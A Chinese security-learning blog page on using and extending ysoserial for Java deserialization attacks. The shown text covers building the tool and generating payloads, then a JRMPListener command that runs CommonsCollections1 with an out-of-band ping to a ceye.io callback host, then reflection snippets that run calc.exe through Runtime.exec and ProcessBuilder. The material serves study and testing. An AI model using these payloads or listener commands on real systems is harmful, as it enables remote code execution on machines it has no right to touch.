<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="Ysoserial改造基础"><meta name="keywords" content="反序列化"><meta name="author" content="mlccs,undefined"><meta name="copyright" content="mlccs"><title>Ysoserial改造基础【!&gt;-_-&lt;!】</title><link rel="stylesheet" href="/css/fan.css"><link rel="stylesheet" href="/css/thirdparty/jquery.mCustomScrollbar.min.css"><link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css"><link rel="icon" href="/favicon.ico"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch.min.css"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch-theme-algolia.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4"></script><!-- link(rel="dns-prefetch" href="https://cdn.jsdelivr.net")--><!-- link(rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css")--><!-- script(src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer)--><!-- script(src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML")--><script src="/js/mathjax/mathjax.js"></script><script type="text/x-mathjax-config">MathJax.Hub.Config({
    tex2jax: {inlineMath: [['$', '$'], ['\\(', '\\)']]}
});
</script><script>var isPassword = '' || false;
if (isPassword) {
    if (prompt('请输入文章密码') !== '') {
        alert('密码错误！');
        history.back();
    }
}</script><script>window.GLOBAL_CONFIG = {
  root: '/',
  algolia: {"appId":"S6Y49E5I4K","apiKey":"8c221da4a00bc9951e60cd14527148e3","indexName":"git_BLOG","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  gitment: ,
  valine: ,
}</script><meta name="generator" content="Hexo 5.4.0"></head><body><canvas id="universe"></canvas><!--#body--><div id="sidebar"><div class="toggle-sidebar-info button-hover"><span data-toggle="文章目录">站点概览</span></div><div class="sidebar-toc"><div class="sidebar-toc-title">目录</div><div class="sidebar-toc-progress"><span class="progress-notice">您已阅读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc-progress-bar"></div></div><div class="sidebar-toc-content" id="sidebar-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Ysoserial-%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">Ysoserial 简介</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%BC%96%E8%AF%91"><span class="toc-number">2.</span> <span class="toc-text">编译</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text">基本使用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Payload%E7%94%9F%E6%88%90"><span class="toc-number">3.1.</span> <span class="toc-text">Payload生成</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%80%E5%90%AF%E4%BA%A4%E4%BA%92%E6%9C%8D%E5%8A%A1"><span class="toc-number">3.2.</span> <span class="toc-text">开启交互服务</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Java%E5%9F%BA%E7%A1%80"><span class="toc-number">4.</span> <span class="toc-text">Java基础</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Final%E5%85%B3%E9%94%AE%E5%AD%97"><span class="toc-number">4.1.</span> <span class="toc-text">Final关键字</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B3%9B%E5%9E%8B%E7%B1%BB"><span class="toc-number">4.2.</span> <span class="toc-text">泛型类</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Java-class%E3%80%81Object%E3%80%81Class%E5%8C%BA%E5%88%AB"><span class="toc-number">4.3.</span> <span class="toc-text">Java class、Object、Class区别</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Hashmap"><span class="toc-number">4.4.</span> <span class="toc-text">Hashmap</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84"><span class="toc-number">4.5.</span> <span class="toc-text">反射</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Runtime-exec%E5%8F%8D%E5%B0%84"><span class="toc-number">4.5.1.</span> <span class="toc-text">Runtime.exec反射</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8C%87%E5%AE%9A%E6%9E%84%E9%80%A0%E6%96%B9%E6%B3%95%E7%94%9F%E6%88%90%E5%AE%9E%E4%BE%8B"><span class="toc-number">4.5.2.</span> <span class="toc-text">指定构造方法生成实例</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%A7%E8%A1%8C%E7%A7%81%E6%9C%89%E6%96%B9%E6%B3%95"><span class="toc-number">4.5.3.</span> <span class="toc-text">执行私有方法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8A%A8%E6%80%81%E4%BB%A3%E7%90%86"><span class="toc-number">4.6.</span> <span class="toc-text">动态代理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E5%B8%B8%E6%8E%A5%E5%8F%A3%E4%BD%BF%E7%94%A8%E7%A4%BA%E4%BE%8B"><span class="toc-number">4.6.1.</span> <span class="toc-text">通常接口使用示例</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8A%A8%E6%80%81%E4%BB%A3%E7%90%86%E4%BD%BF%E7%94%A8%E6%8E%A5%E5%8F%A3"><span class="toc-number">4.6.2.</span> <span class="toc-text">动态代理使用接口</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A1%B9%E7%9B%AE%E7%BB%93%E6%9E%84"><span class="toc-number">5.</span> <span class="toc-text">项目结构</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%A5%E5%8F%A3%E5%87%BD%E6%95%B0"><span class="toc-number">6.</span> <span class="toc-text">入口函数</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Utils%E5%BA%93"><span class="toc-number">7.</span> <span class="toc-text">Utils库</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#getPayloadClass"><span class="toc-number">7.1.</span> <span class="toc-text">getPayloadClass</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#makePayloadObject"><span class="toc-number">7.2.</span> <span class="toc-text">makePayloadObject</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#releasePayload"><span class="toc-number">7.3.</span> <span class="toc-text">releasePayload</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%BA%93"><span class="toc-number">8.</span> <span class="toc-text">序列化与反序列化库</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Payloads%E5%BA%93"><span class="toc-number">9.</span> <span class="toc-text">Payloads库</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Exploit%E5%BA%93"><span class="toc-number">10.</span> <span class="toc-text">Exploit库</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B5%8B%E8%AF%95%E7%B1%BBPayloadRunner"><span class="toc-number">11.</span> <span class="toc-text">测试类PayloadRunner</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%89%A9%E5%B1%95Payload%E5%BA%93"><span class="toc-number">12.</span> <span class="toc-text">扩展Payload库</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Transformer-%E5%88%A9%E7%94%A8%E9%93%BE"><span class="toc-number">12.1.</span> <span class="toc-text">Transformer 利用链</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#InvokerTransformer"><span class="toc-number">12.1.1.</span> <span class="toc-text">InvokerTransformer</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ChainedTransformer"><span class="toc-number">12.1.2.</span> <span class="toc-text">ChainedTransformer</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#TransformedMap"><span class="toc-number">12.1.3.</span> <span class="toc-text">TransformedMap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#AnnotationInvocationHandler"><span class="toc-number">12.1.4.</span> <span class="toc-text">AnnotationInvocationHandler</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BC%96%E5%86%99payload%E5%BA%93"><span class="toc-number">12.2.</span> <span class="toc-text">编写payload库</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#URLDNS%E9%93%BE"><span class="toc-number">13.</span> <span class="toc-text">URLDNS链</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Dns%E8%AF%B7%E6%B1%82%E5%8F%91%E8%B5%B7"><span class="toc-number">13.1.</span> <span class="toc-text">Dns请求发起</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E8%A7%A6%E5%8F%91Dns%E8%AF%B7%E6%B1%82"><span class="toc-number">13.2.</span> <span class="toc-text">反序列化触发Dns请求</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#URLDNS%E5%88%86%E6%9E%90"><span class="toc-number">13.3.</span> <span class="toc-text">URLDNS分析</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E6%A1%A3"><span class="toc-number">14.</span> <span class="toc-text">参考文档</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info-avatar"><img class="author-info-avatar-img" src="/avatar.png"></div><div class="author-info-name">mlccs</div><div class="author-info-description"></div><div class="author-info-articles"><a class="author-info-articles-archives article-meta" href="/archives"><span class="pull-top">日志</span><span class="pull-bottom">8</span></a><a class="author-info-articles-tags article-meta" href="/tags"><span class="pull-top">标签</span><span class="pull-bottom">6</span></a><a class="author-info-articles-categories article-meta" href="/categories"><span class="pull-top">分类</span><span class="pull-bottom">3</span></a></div></div></div><div id="main-container"><header><div id="menu-outer"><i class="menu-list-icon fas fa-bars"></i><nav id="menu-inner"><a class="menu-item" href="/">首页</a><a class="menu-item" href="/tags">标签</a><a class="menu-item" href="/categories">分类</a><a class="menu-item" href="/archives">归档</a></nav><div class="right-info"><a class="search social-icon"><i class="fas fa-search"></i><span> 搜索</span></a><a class="title-name" href="/">!&gt;-_-&lt;!</a><span id="now-time"></span></div></div></header><div id="content-outer"><div id="content-inner"><article id="post"><div class="post-header"><div class="title">Ysoserial改造基础</div><div class="container"><time class="button-hover post-date"><i class="fas fa-calendar-alt article-icon" aria-hidden="true"></i> 发表于 2021-12-23 | 更新于 2021-12-25</time><!--time.button-hover.post-date #[i.fas.fa-calendar-alt.article-icon(aria-hidden="true")] #[=__('post.modified')] #[=date(page['updated'], config.date_format)]--><div class="button-hover categories"><i class="fa fa-inbox article-icon" aria-hidden="true"></i><a class="link-a" href="/categories/Java%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0/">Java安全学习</a></div><div class="button-hover tags"><i class="fa fa-tag article-icon" aria-hidden="true"></i><a class="link-a" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">反序列化</a></div></div></div><div class="main-content"><h1 id="Ysoserial-简介"><a href="#Ysoserial-简介" class="headerlink" title="Ysoserial 简介"></a>Ysoserial 简介</h1><p>​    2015年Gabriel Lawrence (@gebl)和ChrisFrohoff (@frohoff)在AppSecCali上提出了利⽤Apache Commons Collections来构造命令执⾏的利⽤链。⽽ysoserial就是两位原作者在此议题中释出的⼀个⼯具，它可以让⽤户根据⾃⼰选择的利⽤链，⽣成反序列化利⽤数据，通过将这些数据发送给⽬标，从⽽执⾏⽤户预先定义的命令。</p>
<h1 id="编译"><a href="#编译" class="headerlink" title="编译"></a>编译</h1><p>项目地址：<a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial.git">https://github.com/frohoff/ysoserial.git</a></p>
<p>根据github上的编译提示，会出现编译错误</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Requires Java 1.7+ and Maven 3.x+</span><br><span class="line">mvn clean package -DskipTests</span><br></pre></td></tr></table></figure>

<p>在pom.xml的dependencies标签里添加依赖项</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>commons-io<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>commons-io<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>2.4<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>再次执行<code>mvn clean package -DskipTests</code>，编译成功在target目录下生成相对应的jar包</p>
<h1 id="基本使用"><a href="#基本使用" class="headerlink" title="基本使用"></a>基本使用</h1><p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211220153114947.png" alt="image-20211220153114947"></p>
<h2 id="Payload生成"><a href="#Payload生成" class="headerlink" title="Payload生成"></a>Payload生成</h2><p>一般通过运行ysoserial.jar 中的主类函数来生成payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar [payload] &#x27;[command]&#x27;</span><br></pre></td></tr></table></figure>

<p>由于URLDNS这条利用链不需要任何第三方包，所以常用来探测漏洞是否存在。URLDNS的payload生成时需要使用双引号。</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211220154629278.png" alt="image-20211220154629278"></p>
<p>dnslog异常，改用ceye</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211220163810680.png" alt="image-20211220163810680"></p>
<p>测试代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.FileInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">test01</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">        ObjectInputStream ois = <span class="keyword">null</span>;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            ois = <span class="keyword">new</span> ObjectInputStream(<span class="keyword">new</span> FileInputStream(<span class="string">&quot;F:\\java_vul\\ysoserial\\payloads\\dnslog.ser&quot;</span>));</span><br><span class="line">            ois.readObject();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (ClassNotFoundException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211220163828325.png" alt="image-20211220163828325"></p>
<p>注意：生成反序列化payload时要使用与目标环境一致的java版本，否则测试目标反序列化时会失败。改用java7运行上述测试代码，报错如下</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211220164200167.png" alt="image-20211220164200167"></p>
<h2 id="开启交互服务"><a href="#开启交互服务" class="headerlink" title="开启交互服务"></a>开启交互服务</h2><p>一般通过运行ysoserial中的exploit 来开启</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 &#x27;ping -c 2 rce.267hqw.ceye.io&#x27;</span><br></pre></td></tr></table></figure>

<h1 id="Java基础"><a href="#Java基础" class="headerlink" title="Java基础"></a>Java基础</h1><h2 id="Final关键字"><a href="#Final关键字" class="headerlink" title="Final关键字"></a>Final关键字</h2><p>​    在Java中，final关键字可以用来修饰类、方法和变量（包括成员变量和局部变量）。</p>
<p><strong>1、修饰类</strong></p>
<p>　当用final修饰一个类时，表明这个类不能被继承。也就是说，如果一个类你永远不会让他被继承，就可以用final进行修饰。final类中的成员变量可以根据需要设为final，但是要注意final类中的所有成员方法都会被隐式地指定为final方法。<br>    在使用final修饰类的时候，要注意谨慎选择，除非这个类真的在以后不会用来继承或者出于安全的考虑，否则尽量不要将类设计为final类。</p>
<p><strong>2、修饰方法</strong></p>
<p>​    下面这段话摘自《Java编程思想》第四版第143页：<br>　“使用final方法的原因有两个。第一个原因是把方法锁定，以防任何继承类修改它的含义；第二个原因是效率。在早期的Java实现版本中，会将final方法转为内嵌调用。但是如果方法过于庞大，可能看不到内嵌调用带来的任何性能提升。在最近的Java版本中，不需要使用final方法进行这些优化了。“<br>　因此，如果只有在想明确禁止 该方法在子类中被覆盖的情况下才将方法设置为final的。<br>　注：类的private方法会隐式地被指定为final方法。</p>
<p><strong>3、修饰变量</strong></p>
<p>　修饰变量是final用得最多的地方，对于一个final变量，如果是基本数据类型的变量，则其数值一旦在初始化之后便不能更改；如果是引用类型的变量，则在对其初始化之后便不能再让其指向另一个对象。</p>
<h2 id="泛型类"><a href="#泛型类" class="headerlink" title="泛型类"></a>泛型类</h2><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// payloadClass是final修饰的任何继承了ObjectPayload的class</span></span><br><span class="line"><span class="keyword">final</span> Class&lt;? extends ObjectPayload&gt; payloadClass = Utils.getPayloadClass(payloadType);</span><br></pre></td></tr></table></figure>

<h2 id="Java-class、Object、Class区别"><a href="#Java-class、Object、Class区别" class="headerlink" title="Java class、Object、Class区别"></a>Java class、Object、Class区别</h2><p>Class :在Java中，每个class都有一个相应的Class对象。也就是说，当我们编写一个类，编译完成后，在生成的.class文件中，就会产生一个Class对象，是描述一个Java类的meta信息（元信息）的类，Class类不能由用户程序实例化，只能由java虚拟机实例化,一般在反射中使用。</p>
<p>Object<strong>类</strong>，是所有Java类的根。它包括Class类，Object是整个Java语言继承树的唯一一个根。</p>
<p>类是对象的模板，对象是类的具体实例，对象依据类而产生</p>
<p><strong>先有Class还是先有Object</strong></p>
<p>from:<a target="_blank" rel="noopener" href="https://www.cnblogs.com/panchanggui/p/9952509.html">https://www.cnblogs.com/panchanggui/p/9952509.html</a></p>
<p>应该是先有Object类再有Class类。编译器在实现Class类的时候，先继承了Object类，然后编译成.class的字节码，这样就能被JVM加载了。</p>
<p>虚拟机加载了所有类。这些类在虚拟机里都能被Class类进行描述，Object类也是，它的字段，方法什么的也都能被Class类进行描述和表示。而这个表示类的Class实例是由虚拟机装载类时自动构造的。</p>
<p>Object在Class类之前，那是在编译期；Class能表示Object类，那是在JVM中。</p>
<p>class字节码加载到jvm,然后在堆内存生成一个Class对象。然后对象指向字节码，就可以通过Class对象进行操作了。</p>
<h2 id="Hashmap"><a href="#Hashmap" class="headerlink" title="Hashmap"></a>Hashmap</h2><p>HashMap 是一个散列表，它存储的内容是键值对(key-value)映射。<br>HashMap 实现了 Map 接口，根据键的 HashCode 值存储数据，具有很快的访问速度，最多允许一条记录的键为 null，不支持线程同步。<br>HashMap 是无序的，即不会记录插入的顺序。<br>HashMap 继承于AbstractMap，实现了 Map、Cloneable、java.io.Serializable 接口。</p>
<h2 id="反射"><a href="#反射" class="headerlink" title="反射"></a>反射</h2><p>反射：在Java中的反射机制是指在运行状态中，对于任意一个类都能够知道这个类所有的属性和方法；并且对于任意一个对象，都能够调用它的任意一个方法；这种动态获取信息以及动态调用对象方法的功能成为Java语言的反射机制。<br>总的来说，反射让java可以在运行时，根据传入的类名字符串，去执行这个类存在的方法，而且可以修改属性的访问修饰符（public、private、protect）</p>
<p>反射调用某个类的指定方法的基本形式如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Copy <span class="keyword">public</span> <span class="keyword">void</span> <span class="title">execute</span><span class="params">(String className, String methodName)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">    Class clazz = Class.forName(className);    </span><br><span class="line">    clazz.getMethod(methodName).invoke(clazz.newInstance()); </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中涉及4个主要函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">获取类的⽅法： forName</span><br><span class="line">实例化类对象的⽅法： newInstance</span><br><span class="line">获取函数的⽅法： getMethod</span><br><span class="line">执⾏函数的⽅法： invoke</span><br></pre></td></tr></table></figure>

<h3 id="Runtime-exec反射"><a href="#Runtime-exec反射" class="headerlink" title="Runtime.exec反射"></a>Runtime.exec反射</h3><p>java命令执行的直接调用payload形式如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Runtime.getRuntime().exec(<span class="string">&quot;calc.exe&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>其中Runtime.getRuntime()其实就是Runtime类获取其对象的方式，等于new一个Runtime类。之所以封装成一个函数是为了不调用一次建立一个对象，只获取一个对象来执行操作。</p>
<p>使用反射形式实现这个命令执行，如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Class clazz = Class.forName(&quot;java.lang.Runtime&quot;);</span><br><span class="line">clazz.getMethod(&quot;exec&quot;, String.class).invoke(clazz.getMethod(&quot;getRuntime&quot;).invoke(clazz), &quot;calc.exe&quot;);</span><br></pre></td></tr></table></figure>

<p><strong>forName</strong></p>
<p>获得一个class对象(java.lang.Class)有三种方法：</p>
<ol>
<li>obj.getClass(): 如果上下⽂中存在某个类的实例 obj ，那么我们可以直接通过，obj.getClass() 来获取它的类</li>
<li>Test.class:Test是一个已经加载的类，想获取它的java.lang.Class对象，直接拿取class参数即可。（这不是反射机制）</li>
<li>Class.forName:如果知道类的名字，可以直接使用forname来获取</li>
</ol>
<p><strong>getMethod</strong></p>
<p>getMethod 的作用是通过反射获取一个类的某个特定的<code>公有</code>方法。而Java中支持类的重载，不能仅通过函数名来确定一个函数。所以，在调用 getMethod 的时候，需要传递参数类型列表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Class.forName(&quot;java.lang.Runtime&quot;).getMethod(&quot;exec&quot;, String.class)</span><br></pre></td></tr></table></figure>

<p><strong>invoke</strong></p>
<p>invoke方法位于Method类下，其的作用是传入参数，执行方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> Object <span class="title">invoke</span><span class="params">(Object obj, Object... args)</span></span></span><br></pre></td></tr></table></figure>

<p>它的第一个参数是执行method的对象：</p>
<ul>
<li>如果这个方法是一个普通方法，那么第一个参数是类对象</li>
<li>如果这个方法是一个静态方法，那么第一个参数是类</li>
</ul>
<p>正常执行方法形式为 <code>[1].method([2], [3], [4]...) </code>，在反射里就是<code>method.invoke([1], [2], [3], [4]...) </code>。exec是一个普通方法，所以需要传入类对象。</p>
<p>综上，通过反射调用计算器的一句话代码可以为</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Class.forName(<span class="string">&quot;java.lang.Runtime&quot;</span>) 										<span class="comment">// 获取Runtime类</span></span><br><span class="line">        .getMethod(<span class="string">&quot;exec&quot;</span>, String.class)							<span class="comment">// 从Runtime类获取exec方法，其参数类型为String</span></span><br><span class="line">        .invoke(																			<span class="comment">// 执行exec方法</span></span><br><span class="line">                Class.forName(<span class="string">&quot;java.lang.Runtime&quot;</span>)</span><br><span class="line">                      .getMethod(<span class="string">&quot;getRuntime&quot;</span>)   <span class="comment">// 获取Runtime类的一个实例对象，因为exec是一个普通方法</span></span><br><span class="line">                      .invoke(Class.forName(<span class="string">&quot;java.lang.Runtime&quot;</span>))	</span><br><span class="line">                ,<span class="string">&quot;calc.exe&quot;</span>														<span class="comment">// exec方法的参数</span></span><br><span class="line">                );</span><br></pre></td></tr></table></figure>

<h3 id="指定构造方法生成实例"><a href="#指定构造方法生成实例" class="headerlink" title="指定构造方法生成实例"></a>指定构造方法生成实例</h3><p>假设一个类没有getRuntime这样的获取实例的方法，也没有公共的无参构造方法的时候，就要用到getConsturctor()函数。getConsturctor(参数类型)选定后可以通过newInstance(传入的构造函数参数)执行构造函数以获取实例。</p>
<p>比如ProcessBuilder有两个构造函数：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">ProcessBuilder</span><span class="params">(List command)</span></span></span><br><span class="line"><span class="function"><span class="comment">// String…这种语法表示String参数数量是可变的，与String[]一样</span></span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">ProcessBuilder</span><span class="params">(String… command)</span></span></span><br></pre></td></tr></table></figure>

<p>对应2种方法的反射执行代码长这样</p>
<p>list为参数的构造方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Class clazz = Class.forName(<span class="string">&quot;java.lang.ProcessBuilder&quot;</span>);</span><br><span class="line">clazz.getMethod(<span class="string">&quot;start&quot;</span>)				<span class="comment">// start方法无需参数，ProcessBuilder的构造函数已设置了响应的参数</span></span><br><span class="line">  .invoke(</span><br><span class="line">  	clazz.getConstructor(List.class).newInstance(Arrays.asList(<span class="string">&quot;calc.exe&quot;</span>))</span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<p>string为参数的构造方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Class clazz = Class.forName(<span class="string">&quot;java.lang.ProcessBuilder&quot;</span>);</span><br><span class="line">clazz.getMethod(<span class="string">&quot;start&quot;</span>).</span><br><span class="line">	invoke(</span><br><span class="line">    clazz.getConstructor(String[].class).newInstance(<span class="keyword">new</span> String[][]&#123;&#123;<span class="string">&quot;calc.exe&quot;</span>&#125;&#125;)</span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<h3 id="执行私有方法"><a href="#执行私有方法" class="headerlink" title="执行私有方法"></a>执行私有方法</h3><p>前面用的方法或构造方法均为public修饰，可以通过getMethod来获取目标函数。如果目标函数为私有方法，则需要使用getDeclared</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">getMethod   						// 获取当前类中指定公共方法，包括从父类继承的方法，需指定参数类型</span><br><span class="line">getDeclared							// 获取当前类中“声明”的指定的方法，包括私有方法，需指定参数类型</span><br><span class="line">getConstructor					// 获取当前类中指定的公共构造函数，需指定参数类型</span><br><span class="line">getConstructors					// 获取当前类中所有的公共构造函数</span><br><span class="line">getDeclaredConstructor	// 获取当前类中“声明”的指定的构造方法，包括私有的构造方法，需指定参数类型</span><br><span class="line">getDeclaredConstructors	// 获取当前类中“声明”的所有构造方法，包括私有的构造方法</span><br></pre></td></tr></table></figure>

